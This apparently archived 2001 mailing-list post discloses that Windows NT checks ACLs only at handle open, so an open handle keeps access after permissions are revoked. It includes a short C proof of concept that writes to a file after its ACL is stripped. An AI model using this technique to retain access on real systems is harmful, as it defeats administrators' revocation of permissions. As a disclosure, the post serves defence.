-----BEGIN PGP SIGNED MESSAGE----- Sorry for the cross-post; I thought this would be relevent to both communities. The component of the NT executive responsible for enforcing ACLs and DACLs is know as the Security Reference Monitor. When a kernel resource is requested, the requested program specifies the type of access it desires. The SRM checks against the access list, and grants the requestor a HANDLE to the object if requestor has appropriate rights. The check against the ACL only occurs when the HANDLE is first opened, however. If a HANDLE is opened and permissions on the objecect subsiquently change, the original requestor of the object retains the original access-permissions. Therefore, if is possible to retain access to an object after the Create/Owner or an administrator has changed the ACL simply by maintaining an open handle. If the requestor is a service or server-program that is expected to run 24/7 the object will remain accessible long after the ACL has been altered [thing ISAPI,extended stored procedures, et al]. -- c0ncept O/T: I own a honda, and have been told by every mechanic that has looked at it that it is the easiest car to break into [ the AAA guy was nice enough to demonstrate]. I hear newer Hondas are even easier. proof of concept: 1.) create a file named "test.txt". Make it writeable to the curretn user 2.) compile and run the included C code 3.) when the program prompts you to change the ACL, uncheck Allow Inheritable Permissions to Propagate and remove all entries from the ACE. Press <return> at the prompt. 4.) Take ownership of the file and open it. Notice that although the ACL had already been modified, the write succeeded. [-- cut code here --] #include <windows.h> #include <stdio.h> #include <stdlib.h> #define FILE_NAME "test.txt" #define MESSAGE "Test" #define MSG_LEN 4 int main(int argc, char** argv) { HANDLE fileHandle; DWORD written; fileHandle = CreateFile(FILE_NAME,GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL); if(fileHandle == INVALID_HANDLE_VALUE){ perror("Invalid Handle Value.\n"); exit(1); } printf("Change the file's ACLs and press enter."); getchar(); WriteFile(fileHandle,MESSAGE,MSG_LEN,&written,NULL); CloseHandle(fileHandle); return 0; } -----BEGIN PGP SIGNATURE----- Version: Hush 2.0 wlwEARECABwFAjuNdeQVHGMwbmNlcHRAaHVzaG1haWwuY29tAAoJEPQWHaIUc7jETigA n3E8BIlimuBni27rFfMuDV5FslDTAKCWoLPNCVWbYkFZOqoQB0JfHHfRWw== =gsEn -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 22:08:20 PDT